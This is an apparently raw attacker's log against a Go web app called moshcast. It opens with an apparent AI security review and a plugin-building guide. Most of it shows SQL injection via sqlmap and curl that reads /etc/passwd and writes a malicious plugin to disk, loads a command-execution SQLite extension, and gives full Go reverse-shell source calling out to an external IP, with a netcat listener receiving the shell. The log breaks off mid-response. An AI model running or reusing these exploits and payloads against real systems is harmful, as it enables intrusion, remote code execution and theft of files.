  - Static pages (404.html, 500.html) and templates: Writable by an attacker leads to defacement/XSS, but not by themselves to server-side code execution without the DB/extension/plugin vectors above.

  Why these are realistic

  - Templates are reparsed from disk each request (template.ParseFiles), so template compromise is “live”.
  - Exposing *Server to templates gives them direct reach to the DB and other exported methods, turning “template edit” into “arbitrary SQL”.
  - The plugin loader executes any .so it finds, by design.

  Mitigations (targeted)

  - Pass minimal view models to templates; never pass *Server, *sql.DB, or anything with dangerous exported methods.
  - Remove or gate utils.LoadPlugins in production, or run with a plugins directory that is not writable by the service or attackers.
  - Ensure SQLite loadable extensions are disabled; use the standard driver or explicitly disallow load_extension.
  - Protect template and config directories with strict permissions, or embed templates using Go embed.

  If you want, I can:

  - Patch handlers.go to pass safe DTOs into templates.
  - Add a build flag/env to skip LoadPlugins in production.
  - Review the SQLite driver usage to ensure extension loading is off.

sqlite load extension?
https://github.com/mpaolino/sqlite-execute-module

// compile using docker
/app # git clone https://github.com/mpaolino/sqlite-execute-module.git
Cloning into 'sqlite-execute-module'...
remote: Enumerating objects: 29, done.
remote: Counting objects: 100% (29/29), done.
remote: Compressing objects: 100% (26/26), done.
remote: Total 29 (delta 12), reused 4 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (29/29), 6.82 KiB | 6.82 MiB/s, done.
Resolving deltas: 100% (12/12), done.
/app # cd sqlite-execute-module/
/app/sqlite-execute-module # ls
Makefile                 sqlite-execute-module.c
README.md                test-command
/app/sqlite-execute-module # make
gcc -s -g -fPIC -shared sqlite-execute-module.c -o sqlite-execute-module.so
/app/sqlite-execute-module # ls
Makefile                  sqlite-execute-module.so
README.md                 test-command
sqlite-execute-module.c
/app/sqlite-execute-module # pwd
/app/sqlite-execute-module
/app/sqlite-execute-module # sqlite3 ../
Dockerfile              go.sum                  plugins/
Makefile                html/                   pool/
config.yaml             log/                    sqlite-execute-module/
data/                   main.go                 templates/
docker-compose.yml      mosh/                   utils/
go.mod                  moshcast
/app/sqlite-execute-module # sqlite3 ../data/data.db
SQLite version 3.48.0 2025-01-14 11:05:00
Enter ".help" for usage hints.
sqlite> select load_extension('/app/sqlite-execute-module/sqlite-execute-module.so')
   ...> ;
sqlite> select execute('ls');
Makefile                  sqlite-execute-module.so
README.md                 test-command

docker cp b74718585c70:/app/sqlite-execute-module/sqlite-execute-module.so exec.so
Successfully copied 15.9kB to /tmp/qwer/asdf/moshcast/exec.so

// write extension to file
// load
// run command

[*] /app/plugins/!--.so
[*] /app/plugins/.a.so
[*] /app/plugins/.nxven
[*] /app/plugins/.nxven/agent-a7
[*] /app/plugins/.str4thus
[*] /app/plugins/.str4thus/pwn

ql-shell> select name from fsdir('/tmp')
[06:27:53] [INFO] fetching SQL SELECT statement query output: 'select name from fsdir('/tmp')'
select name from fsdir('/tmp') [29]:
[*] /tmp
[*] /tmp/.nxven
[*] /tmp/.nxven/1.bin
[*] /tmp/.nxven/10.bin
[*] /tmp/.nxven/11.bin
[*] /tmp/.nxven/12.bin
[*] /tmp/.nxven/13.bin
[*] /tmp/.nxven/14.bin
[*] /tmp/.nxven/15.bin
[*] /tmp/.nxven/16.bin
[*] /tmp/.nxven/17.bin
[*] /tmp/.nxven/18.bin
[*] /tmp/.nxven/19.bin
[*] /tmp/.nxven/2.bin
[*] /tmp/.nxven/20.bin
[*] /tmp/.nxven/21.bin
[*] /tmp/.nxven/22.bin
[*] /tmp/.nxven/23.bin
[*] /tmp/.nxven/24.bin
[*] /tmp/.nxven/3.bin
[*] /tmp/.nxven/4.bin
[*] /tmp/.nxven/5.bin
[*] /tmp/.nxven/6.bin
[*] /tmp/.nxven/7.bin
[*] /tmp/.nxven/8.bin
[*] /tmp/.nxven/9.bin
[*] /tmp/.nxven/output.bin
[*] /tmp/access.log
[*] /tmp/error.log

[06:38:26] [INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[06:38:26] [INFO] fetching SQL SELECT statement query output: 'SELECT name from fsdir('/tmp/')'
SELECT name from fsdir('/tmp/') [30]:
[*] /tmp/
[*] /tmp//.nxven
[*] /tmp//.nxven/1.bin
[*] /tmp//.nxven/10.bin
[*] /tmp//.nxven/11.bin
[*] /tmp//.nxven/12.bin
[*] /tmp//.nxven/13.bin
[*] /tmp//.nxven/14.bin
[*] /tmp//.nxven/15.bin
[*] /tmp//.nxven/16.bin
[*] /tmp//.nxven/17.bin
[*] /tmp//.nxven/18.bin
[*] /tmp//.nxven/19.bin
[*] /tmp//.nxven/2.bin
[*] /tmp//.nxven/20.bin
[*] /tmp//.nxven/21.bin
[*] /tmp//.nxven/22.bin
[*] /tmp//.nxven/23.bin
[*] /tmp//.nxven/24.bin
[*] /tmp//.nxven/3.bin
[*] /tmp//.nxven/4.bin
[*] /tmp//.nxven/5.bin
[*] /tmp//.nxven/6.bin
[*] /tmp//.nxven/7.bin
[*] /tmp//.nxven/8.bin
[*] /tmp//.nxven/9.bin
[*] /tmp//.nxven/output.bin
[*] /tmp//access.log
[*] /tmp//error.log
[*] /tmp//out.bin

sqlmap -u "http://46.101.222.148:8080/meta.json?date=asdf" --random-agent --sql-query="SELECT name from fsdir('/tmp/')"

sqlmap -u "http://46.101.222.148:8080/meta.json?date=asdf" --random-agent --sql-query="SELECT readfile('/tmp/out1.bin')"
sqlmap -u "http://46.101.222.148:8080/meta.json?date=asdf" --random-agent --sql-query="select writefile('/tmp/out1.bin', \"\x41\", 0100644)"

 Here’s how to build and use plugins like plugins/example.go with this app:

  Build

  - From repo root, compile the plugin as a Go plugin: go build -buildmode=plugin -o plugins/example.so
  plugins/example.go
  - Match build env to the app: same GOOS/GOARCH (Linux/amd64 here) and same Go version as used to build
  the binary.
  - Ensure the output .so lives in the configured plugins dir (config.yaml → Paths.Plugins: plugins/).

  Plugin contract

  - Package: package main
  - Import: moshcast/utils
  - Exported symbol: func Init() utils.Init
  - Implementation: return a type that implements utils.Init (has Process()).
  - Loader behavior: on startup it scans the plugins dir, opens each .so, looks up Init, calls it, then
  calls Process().

  Minimal template

  - package main
  - import "moshcast/utils"
  - type MyPlugin struct{}
  - func (p *MyPlugin) Process() { /* do work */ }
  - func Init() utils.Init { return &MyPlugin{} }

  Verify

  - Build the app: make build
  - Run: ./moshcast
  - You should see a log like “Loading plugin: plugins/example.so” and the plugin’s output (e.g., “🔥
  PLUGIN LOAD! 🔥”).

  Notes

  - Go plugins are strict: build with the same Go version and identical module path/dependency versions as
  the main binary.
  - If you want, I can add a make plugins target to compile all .go files under plugins/ into .so files.

CGO_ENABLED=1 GOOS=linux GOARCH=amd64 go build -v -o "yolo.so" /yolo.go

https://pkg.go.dev/plugin
GOOS=linux GOARCH=amd64 go build -buildmode=plugin -o yolo-shared.so ./yolo.go

/app # go mod tidy && go mod vendor
/app # CGO_ENABLED=1 GOOS=linux GOARCH=amd64 go build -mod=vendor -buildmode=plugin -o plugins/yolo.so ./
^C
/app # CGO_ENABLED=1 GOOS=linux GOARCH=amd64 go build -mod=vendor -buildmode=plugin -o plugins/yolo.so ./plugins/yolo.go

./moshcast
2025/09/29 16:29:52 MoshCast 1.0.0
2025/09/29 16:29:52 Loading plugin: plugins/yolo.so
🔥 PLUGIN LOAD! 🔥
This URL has no default content configured. <a href="https://webhook.site/#!/edit/45ac954f-cce8-4713-bab1-39daa427cce0">Change response in Webhook.site</a>.
2025/09/29 16:29:52 Started on :9080

https://gist.github.com/yougg/b47f4910767a74fcfe1077d21568070e

 CGO_ENABLED=1 GOOS=linux GOARCH=amd64 go build -mod=vendor -buildmode=plugin -o plugins/test.so ./plugins/test.go

/app # cat plugins/test.go
//go:generate sh -c "CGO_ENABLED=0 go build -installsuffix netgo -tags netgo -ldflags \"-s -w -extldflags '-static'\" -o $DOLLAR(basename ${GOFILE} .go)`go env GOEXE` ${GOFILE}"
// +build !windows

// Reverse Shell in Go
// http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
// Test with nc -lvvp 6666
package main

import (
	"net"
	"os/exec"
	"time"
	"moshcast/utils"
)

type Bunny struct{}

func (e *Bunny) Process() {
	reverse("172.232.50.49:9999")
}

func Init() utils.Init {
	return &Bunny{}
}

// bash -i >& /dev/tcp/localhost/6666 0>&1
func reverse(host string) {
	c, err := net.Dial("tcp", host)
	if nil != err {
		if nil != c {
			c.Close()
		}
		time.Sleep(time.Minute)
		reverse(host)
	}

	cmd := exec.Command("/bin/sh")
	cmd.Stdin, cmd.Stdout, cmd.Stderr = c, c, c
	cmd.Run()
	c.Close()
	reverse(host)
}

root@localhost:~/asdf/massdns# nc -lvnp 9999
listening on [any] 9999 ...
connect to [172.232.50.49] from (UNKNOWN) [192.226.135.24] 38784
ls
Dockerfile
Makefile
config.yaml
data
docker-compose.yml
go.mod
go.sum
html
log
main.go
mosh
moshcast
plugins
pool
sqlite-execute-module
templates
utils
vendor

sqlmap -u "http://46.101.222.148:8080/meta.json?date=asdf" --random-agent --sql-query="select name from fsdir('/app/plugins')"

[*] ending @ 13:36:45 /2025-09-29/

.../asdf/moshcast/chunks > sqlmap -u "http://46.101.222.148:8080/meta.json?date=1" \                                                                                                                                     lo at kali (-)(main)
  --sql-query="SELECT length(readfile('////tmp/.nxven/24.bin')), 59"
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.9.6#stable}
|_ -| . [.]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:37:07 /2025-09-29/

[13:37:07] [INFO] resuming back-end DBMS 'sqlite'
[13:37:07] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: date (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: date=asdf' UNION ALL SELECT CONCAT(CONCAT('qjppq','BuHKQYTbNQNYTcRYKLLbZZmLZRQFiZHTSpPnvNCl'),'qqpjq'),59-- ZNmU
---
[13:37:07] [INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[13:37:07] [INFO] fetching SQL SELECT statement query output: 'SELECT length(readfile('////tmp/.nxven/24.bin')), 59'
SELECT length(readfile('////tmp/.nxven/24.bin')), 59: '88576,59'
[13:37:07] [INFO] fetched data logged to text files under '/home/lo/.local/share/sqlmap/output/46.101.222.148'

[*] ending @ 13:37:07 /2025-09-29/

[*] //////tmp/out_hex
[*] //////tmp/out_hex/htmx.so.part000.hex.bin
[*] //////tmp/out_hex/htmx.so.part001.hex.bin
[*] //////tmp/out_hex/htmx.so.part002.hex.bin
[*] //////tmp/out_hex/htmx.so.part003.hex.bin
[*] //////tmp/out_hex/htmx.so.part004.hex.bin
[*] //////tmp/out_hex/htmx.so.part005.hex.bin
[*] //////tmp/out_hex/htmx.so.part006.hex.bin
[*] //////tmp/out_hex/htmx.so.part007.hex.bin
[*] //////tmp/out_hex/htmx.so.part008.hex.bin
[*] //////tmp/out_hex/htmx.so.part009.hex.bin
[*] //////tmp/out_hex/htmx.so.part010.hex.bin
[*] //////tmp/out_hex/htmx.so.part011.hex.bin
[*] //////tmp/out_hex/htmx.so.part012.hex.bin
[*] //////tmp/out_hex/htmx.so.part013.hex.bin
[*] //////tmp/out_hex/htmx.so.part014.hex.bin
[*] //////tmp/out_hex/htmx.so.part015.hex.bin
[*] //////tmp/out_hex/htmx.so.part016.hex.bin
[*] //////tmp/out_hex/htmx.so.part017.hex.bin
[*] //////tmp/out_hex/htmx.so.part018.hex.bin
[*] //////tmp/out_hex/htmx.so.part019.hex.bin
[*] //////tmp/out_hex/htmx.so.part020.hex.bin
[*] //////tmp/out_hex/htmx.so.part021.hex.bin
[*] //////tmp/out_hex/htmx.so.part022.hex.bin
[*] //////tmp/out_hex/htmx.so.part023.hex.bin
[*] //////tmp/out_hex/htmx.so.part024.hex.bin
[*] //////tmp/out_hex/htmx.so.part025.hex.bin
[*] //////tmp/out_hex/htmx.so.part026.hex.bin
[*] //////tmp/out_hex/htmx.so.part027.hex.bin
[*] //////tmp/out_hex/htmx.so.part028.hex.bin
[*] //////tmp/out_hex/htmx.so.part029.hex.bin

out_hex/htmx.so.part030.hex: curl: (52) Empty reply from server

curl -sS -G 'http://46.101.222.148:8080/meta.json' \                                                                                                                                          lo at kali (-)(main)
  --data-urlencode "date=' UNION ALL SELECT readfile('/etc/hosts'),59-- -"
{
  "Songs": [
	{
	  "Title": "# Your system has configured &#39;manage_etc_hosts&#39; as True.
# As a result, if you wish for changes to this file to persist
# then you will need to either
# a.) make changes to the master file in /etc/cloud/templates/hosts.debian.tmpl
# b.) change or remove the value of &#39;manage_etc_hosts&#39; in
#     /etc/cloud/cloud.cfg or cloud-config from user-data
#
127.0.1.1 moshcast moshcast
127.0.0.1 localhost

# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

",
	  "Date": "1970-01-01T00:00:59Z"
	}
  ]
}

> curl -sS -G 'http://46.101.222.148:8080/meta.json' \                                                                                                                                          lo at kali (-)(main)
  --data-urlencode "date=' UNION ALL SELECT readfile('/etc/hosts')||readfile('/etc/passwd'),59-- -"
{
  "Songs": [
	{
	  "Title": "# Your system has configured &#39;manage_etc_hosts&#39; as True.
# As a result, if you wish for changes to this file to persist
# then you will need to either
# a.) make changes to the master file in /etc/cloud/templates/hosts.debian.tmpl
# b.) change or remove the value of &#39;manage_etc_hosts&#39; in
#     /etc/cloud/cloud.cfg or cloud-config from user-data
#
127.0.1.1 moshcast moshcast
127.0.0.1 localhost

# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
",
	  "Date": "1970-01-01T00:00:59Z"
	}
  ]
}

curl -sS -G 'http://46.101.222.148:8080/meta.json' \                                                                                                                                          lo at kali (-)(main)
  --data-urlencode "date=' union all select writefile('/app/plugins/htmx.so',readfile('/tmp/other/htmx.so.part000.hex.bin')||readfile('/tmp/other/htmx.so.part001.hex.bin')||readfile('/tmp/other/htmx.so.part002.hex.bin')||readfile('/tmp/other/htmx.so.part003.hex.bin')||readfile('/tmp/other/htmx.so.part004.hex.bin')||readfile('/tmp/other/htmx.so.part005.hex.bin')||readfile('/tmp/other/htmx.so.part006.hex.bin')||readfile('/tmp/other/htmx.so.part007.hex.bin')||readfile('/tmp/other/htmx.so.part008.hex.bin')||readfile('/tmp/other/htmx.so.part009.hex.bin')||readfile('/tmp/other/htmx.so.part010.hex.bin')||readfile('/tmp/other/htmx.so.part011.hex.bin')||readfile('/tmp/other/htmx.so.part012.hex.bin')||readfile('/tmp/other/htmx.so.part013.hex.bin')||readfile('/tmp/other/htmx.so.part014.hex.bin')||readfile('/tmp/other/htmx.so.part015.hex.bin')||readfile('/tmp/other/htmx.so.part016.hex.bin')||readfile('/tmp/other/htmx.so.part017.hex.bin')||readfile('/tmp/other/htmx.so.part018.hex.bin')||readfile('/tmp/other/htmx.so.part019.hex.bin')||readfile('/tmp/other/htmx.so.part020.hex.bin')||readfile('/tmp/other/htmx.so.part021.hex.bin')||readfile('/tmp/other/htmx.so.part022.hex.bin')||readfile('/tmp/other/htmx.so.part023.hex.bin')||readfile('/tmp/other/htmx.so.part024.hex.bin')||readfile('/tmp/other/htmx.so.part025.hex.bin')||readfile('/tmp/other/htmx.so.part026.hex.bin')||readfile('/tmp/other/htmx.so.part027.hex.bin')||readfile('/tmp/other/htmx.so.part028.hex.bin')||readfile('/tmp/other/htmx.so.part029.hex.bin')||readfile('/tmp/other/htmx.so.part030.hex.bin')||readfile('/tmp/other/htmx.so.part031.hex.bin')||readfile('/tmp/other/htmx.so.part032.hex.bin')||readfile('/tmp/other/htmx.so.part033.hex.bin')||readfile('/tmp/other/htmx.so.part034.hex.bin')||readfile('/tmp/other/htmx.so.part035.hex.bin')||readfile('/tmp/other/htmx.so.part036.hex.bin')||readfile('/tmp/other/htmx.so.part037.hex.bin')||readfile('/tmp/other/htmx.so.part038.hex.bin')||readfile('/tmp/other/htmx.so.part039.hex.bin')||readfile('/tmp/other/htmx.so.part040.hex.bin')||readfile('/tmp/other/htmx.so.part041.hex.bin')||readfile('/tmp/other/htmx.so.part042.hex.bin')||readfile('/tmp/other/htmx.so.part043.hex.bin')||readfile('/tmp/other/htmx.so.part044.hex.bin')||readfile('/tmp/other/htmx.so.part045.hex.bin')||readfile('/tmp/other/htmx.so.part046.hex.bin')||readfile('/tmp/other/htmx.so.part047.hex.bin')||readfile('/tmp/other/htmx.so.part048.hex.bin')||readfile('/tmp/other/htmx.so.part049.hex.bin')||readfile('/tmp/other/htmx.so.part050.hex.bin')||readfile('/tmp/other/htmx.so.part051.hex.bin')||readfile('/tmp/other/htmx.so.part052.hex.bin')||readfile('/tmp/other/htmx.so.part053.hex.bin')||readfile('/tmp/other/htmx.so.part054.hex.bin')||readfile('/tmp/other/htmx.so.part055.hex.bin')||readfile('/tmp/other/htmx.so.part056.hex.bin')||readfile('/tmp/other/htmx.so.part057.hex.bin')||readfile('/tmp/other/htmx.so.part058.hex.bin')||readfile('/tmp/other/htmx.so.part059.hex.bin')||readfile('/tmp/other/htmx.so.part060.hex.bin')||readfile('/tmp/other/htmx.so.part061.hex.bin')||readfile('/tmp/other/htmx.so.part062.hex.bin')||readfile('/tmp/other/htmx.so.part063.hex.bin')||readfile('/tmp/other/htmx.so.part064.hex.bin')||readfile('/tmp/other/htmx.so.part065.hex.bin')||readfile('/tmp/other/htmx.so.part066.hex.bin')||readfile('/tmp/other/htmx.so.part067.hex.bin')||readfile('/tmp/other/htmx.so.part068.hex.bin')||readfile('/tmp/other/htmx.so.part069.hex.bin')||readfile('/tmp/other/htmx.so.part070.hex.bin')||readfile('/tmp/other/htmx.so.part071.hex.bin')||readfile('/tmp/other/htmx.so.part072.hex.bin')||readfile('/tmp/other/htmx.so.part073.hex.bin')||readfile('/tmp/other/htmx.so.part074.hex.bin')||readfile('/tmp/other/htmx.so.part075.hex.bin')||readfile('/tmp/other/htmx.so.part076.hex.bin')||readfile('/tmp/other/htmx.so.part077.hex.bin')||readfile('/tmp/other/htmx.so.part078.hex.bin')||readfile('/tmp/other/htmx.so.part079.hex.bin')||readfile('/tmp/other/htmx.so.part080.hex.bin')||readfile('/tmp/other/htmx.so.part081.hex.bin')||readfile('/tmp/other/htmx.so.part082.hex.bin')||readfile('/tmp/other/htmx.so.part083.hex.bin')||readfile('/tmp/other/htmx.so.part084.hex.bin')||readfile('/tmp/other/htmx.so.part085.hex.bin')||readfile('/tmp/other/htmx.so.part086.hex.bin')||readfile('/tmp/other/htmx.so.part087.hex.bin')||readfile('/tmp/other/htmx.so.part088.hex.bin')||readfile('/tmp/other/htmx.so.part089.hex.bin')||readfile('/tmp/other/htmx.so.part090.hex.bin')||readfile('/tmp/other/htmx.so.part091.hex.bin')||readfile('/tmp/other/htmx.so.part092.hex.bin')||readfile('/tmp/other/htmx.so.part093.hex.bin')||readfile('/tmp/other/htmx.so.part094.hex.bin')||readfile('/tmp/other/htmx.so.part095.hex.bin')||readfile('/tmp/other/htmx.so.part096.hex.bin')||readfile('/tmp/other/htmx.so.part097.hex.bin')||readfile('/tmp/other/htmx.so.part098.hex.bin')||readfile('/tmp/other/htmx.so.part099.hex.bin')||readfile('/tmp/other/htmx.so.part100.hex.bin')||readfile('/tmp/other/htmx.so.part101.hex.bin')||readfile('/tmp/other/htmx.so.part102.hex.bin')||readfile('/tmp/other/htmx.so.part103.hex.bin')||readfile('/tmp/other/htmx.so.part104.hex.bin')||readfile('/tmp/other/htmx.so.part105.hex.bin')||readfile('/tmp/other/htmx.so.part106.hex.bin')||readfile('/tmp/other/htmx.so.part107.hex.bin')||readfile('/tmp/other/htmx.so.part108.hex.bin')||readfile('/tmp/other/htmx.so.part109.hex.bin')||readfile('/tmp/other/htmx.so.part110.hex.bin')||readfile('/tmp/other/htmx.so.part111.hex.bin')),59-- -"
{
  "Songs": [
	{
	  "Title": "6720000",
	  "Date": "1970-01-01T00:00:59Z"
	}
  ]
}                                    

.../asdf/moshcast/chunks > sqlmap -u "http://46.101.222.148:8080/meta.json?date=asdf" --random-agent --sql-query="select name from fsdir('//////app/plugins/')"                                                          lo at kali (-)(main)
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.9.6#stable}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:53:21 /2025-09-29/

[13:53:21] [INFO] fetched random HTTP User-Agent header value 'Opera/9.02 (Windows NT 5.1; U; ja)' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[13:53:21] [INFO] resuming back-end DBMS 'sqlite'
[13:53:21] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: date (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: date=asdf' UNION ALL SELECT CONCAT(CONCAT('qjppq','BuHKQYTbNQNYTcRYKLLbZZmLZRQFiZHTSpPnvNCl'),'qqpjq'),59-- ZNmU
---
[13:53:22] [INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[13:53:22] [INFO] fetching SQL SELECT statement query output: 'select name from fsdir('//////app/plugins/')'
select name from fsdir('//////app/plugins/') [24]:
[*] //////app/plugins/
[*] //////app/plugins//!--.so
[*] //////app/plugins//!.a.so
[*] //////app/plugins//.!----.so
[*] //////app/plugins//.a.so
[*] //////app/plugins//.l
[*] //////app/plugins//.l/ag
[*] //////app/plugins//.l/tt
[*] //////app/plugins//.nxven
[*] //////app/plugins//.nxven/agent-a7
[*] //////app/plugins//.pwnng
[*] //////app/plugins//.pwnng.so
[*] //////app/plugins//.pwnng/1
[*] //////app/plugins//.pwnng/2
[*] //////app/plugins//.pwnng/agent
[*] //////app/plugins//.str4thus
[*] //////app/plugins//.str4thus/agent
[*] //////app/plugins//.str4thus/pwn
[*] //////app/plugins//.zzz
[*] //////app/plugins//.zzz/agent
[*] //////app/plugins//.zzz/la
[*] //////app/plugins//.zzz/t.pcap
[*] //////app/plugins//.zzz/tcpdump.amd64
[*] //////app/plugins//htmx.so

[13:53:22] [INFO] fetched data logged to text files under '/home/lo/.local/share/sqlmap/output/46.101.222.148'

[*] ending @ 13:53:22 /2025-09-29/

curl -sS -G 'http://46.101.222.148:8080/meta.json' \                                                                                                                                          lo at kali (-)(main)
  --data-urlencode "date=' union all select writefile('/app/plugins/htmx.so',readfile('/tmp/other/htmx.so.part000.hex.bin')||readfile('/tmp/other/htmx.so.part001.hex.bin')||readfile('/tmp/other/htmx.so.part002.hex.bin')||readfile('/tmp/other/htmx.so.part003.hex.bin')||readfile('/tmp/other/htmx.so.part004.hex.bin')||readfile('/tmp/other/htmx.so.part005.hex.bin')||readfile('/tmp/other/htmx.so.part006.hex.bin')||readfile('/tmp/other/htmx.so.part007.hex.bin')||readfile('/tmp/other/htmx.so.part008.hex.bin')||readfile('/tmp/other/htmx.so.part009.hex.bin')||readfile('/tmp/other/htmx.so.part010.hex.bin')||readfile('/tmp/other/htmx.so.part011.hex.bin')||readfile('/tmp/other/htmx.so.part012.hex.bin')||readfile('/tmp/other/htmx.so.part013.hex.bin')||readfile('/tmp/other/htmx.so.part014.hex.bin')||readfile('/tmp/other/htmx.so.part015.hex.bin')||readfile('/tmp/other/htmx.so.part016.hex.bin')||readfile('/tmp/other/htmx.so.part017.hex.bin')||readfile('/tmp/other/htmx.so.part018.hex.bin')||readfile('/tmp/other/htmx.so.part019.hex.bin')||readfile('/tmp/other/htmx.so.part020.hex.bin')||readfile('/tmp/other/htmx.so.part021.hex.bin')||readfile('/tmp/other/htmx.so.part022.hex.bin')||readfile('/tmp/other/htmx.so.part023.hex.bin')||readfile('/tmp/other/htmx.so.part024.hex.bin')||readfile('/tmp/other/htmx.so.part025.hex.bin')||readfile('/tmp/other/htmx.so.part026.hex.bin')||readfile('/tmp/other/htmx.so.part027.hex.bin')||readfile('/tmp/other/htmx.so.part028.hex.bin')||readfile('/tmp/other/htmx.so.part029.hex.bin')||readfile('/tmp/other/htmx.so.part030.hex.bin')||readfile('/tmp/other/htmx.so.part031.hex.bin')||readfile('/tmp/other/htmx.so.part032.hex.bin')||readfile('/tmp/other/htmx.so.part033.hex.bin')||readfile('/tmp/other/htmx.so.part034.hex.bin')||readfile('/tmp/other/htmx.so.part035.hex.bin')||readfile('/tmp/other/htmx.so.part036.hex.bin')||readfile('/tmp/other/htmx.so.part037.hex.bin')||readfile('/tmp/other/htmx.so.part038.hex.bin')||readfile('/tmp/other/htmx.so.part039.hex.bin')||readfile('/tmp/other/htmx.so.part040.hex.bin')||readfile('/tmp/other/htmx.so.part041.hex.bin')||readfile('/tmp/other/htmx.so.part042.hex.bin')||readfile('/tmp/other/htmx.so.part043.hex.bin')||readfile('/tmp/other/htmx.so.part044.hex.bin')||readfile('/tmp/other/htmx.so.part045.hex.bin')||readfile('/tmp/other/htmx.so.part046.hex.bin')||readfile('/tmp/other/htmx.so.part047.hex.bin')||readfile('/tmp/other/htmx.so.part048.hex.bin')||readfile('/tmp/other/htmx.so.part049.hex.bin')||readfile('/tmp/other/htmx.so.part050.hex.bin')||readfile('/tmp/other/htmx.so.part051.hex.bin')||readfile('/tmp/other/htmx.so.part052.hex.bin')||readfile('/tmp/other/htmx.so.part053.hex.bin')||readfile('/tmp/other/htmx.so.part054.hex.bin')||readfile('/tmp/other/htmx.so.part055.hex.bin')||readfile('/tmp/other/htmx.so.part056.hex.bin')||readfile('/tmp/other/htmx.so.part057.hex.bin')||readfile('/tmp/other/htmx.so.part058.hex.bin')||readfile('/tmp/other/htmx.so.part059.hex.bin')||readfile('/tmp/other/htmx.so.part060.hex.bin')||readfile('/tmp/other/htmx.so.part061.hex.bin')||readfile('/tmp/other/htmx.so.part062.hex.bin')||readfile('/tmp/other/htmx.so.part063.hex.bin')||readfile('/tmp/other/htmx.so.part064.hex.bin')||readfile('/tmp/other/htmx.so.part065.hex.bin')||readfile('/tmp/other/htmx.so.part066.hex.bin')||readfile('/tmp/other/htmx.so.part067.hex.bin')||readfile('/tmp/other/htmx.so.part068.hex.bin')||readfile('/tmp/other/htmx.so.part069.hex.bin')||readfile('/tmp/other/htmx.so.part070.hex.bin')||readfile('/tmp/other/htmx.so.part071.hex.bin')||readfile('/tmp/other/htmx.so.part072.hex.bin')||readfile('/tmp/other/htmx.so.part073.hex.bin')||readfile('/tmp/other/htmx.so.part074.hex.bin')||readfile('/tmp/other/htmx.so.part075.hex.bin')||readfile('/tmp/other/htmx.so.part076.hex.bin')||readfile('/tmp/other/htmx.so.part077.hex.bin')||readfile('/tmp/other/htmx.so.part078.hex.bin')||readfile('/tmp/other/htmx.so.part079.hex.bin')||readfile('/tmp/other/htmx.so.part080.hex.bin')||readfile('/tmp/other/htmx.so.part081.hex.bin')||readfile('/tmp/other/htmx.so.part082.hex.bin')||readfile('/tmp/other/htmx.so.part083.hex.bin')||readfile('/tmp/other/htmx.so.part084.hex.bin')||readfile('/tmp/other/htmx.so.part085.hex.bin')||readfile('/tmp/other/htmx.so.part086.hex.bin')||readfile('/tmp/other/htmx.so.part087.hex.bin')||readfile('/tmp/other/htmx.so.part088.hex.bin')||readfile('/tmp/other/htmx.so.part089.hex.bin')||readfile('/tmp/other/htmx.so.part090.hex.bin')||readfile('/tmp/other/htmx.so.part091.hex.bin')||readfile('/tmp/other/htmx.so.part092.hex.bin')||readfile('/tmp/other/htmx.so.part093.hex.bin')||readfile('/tmp/other/htmx.so.part094.hex.bin')||readfile('/tmp/other/htmx.so.part095.hex.bin')||readfile('/tmp/other/htmx.so.part096.hex.bin')||readfile('/tmp/other/htmx.so.part097.hex.bin')||readfile('/tmp/other/htmx.so.part098.hex.bin')||readfile('/tmp/other/htmx.so.part099.hex.bin')||readfile('/tmp/other/htmx.so.part100.hex.bin')||readfile('/tmp/other/htmx.so.part101.hex.bin')||readfile('/tmp/other/htmx.so.part102.hex.bin')||readfile('/tmp/other/htmx.so.part103.hex.bin')||readfile('/tmp/other/htmx.so.part104.hex.bin')||readfile('/tmp/other/htmx.so.part105.hex.bin')||readfile('/tmp/other/htmx.so.part106.hex.bin')||readfile('/tmp/other/htmx.so.part107.hex.bin')||readfile('/tmp/other/htmx.so.part108.hex.bin')||readfile('/tmp/other/htmx.so.part109.hex.bin')||readfile('/tmp/other/htmx.so.part110.hex.bin')||readfile('/tmp/other/htmx.so.part111.hex.bin')||readfile('/tmp/other/htmx.so.part112.hex.bin')),59-- -"
{
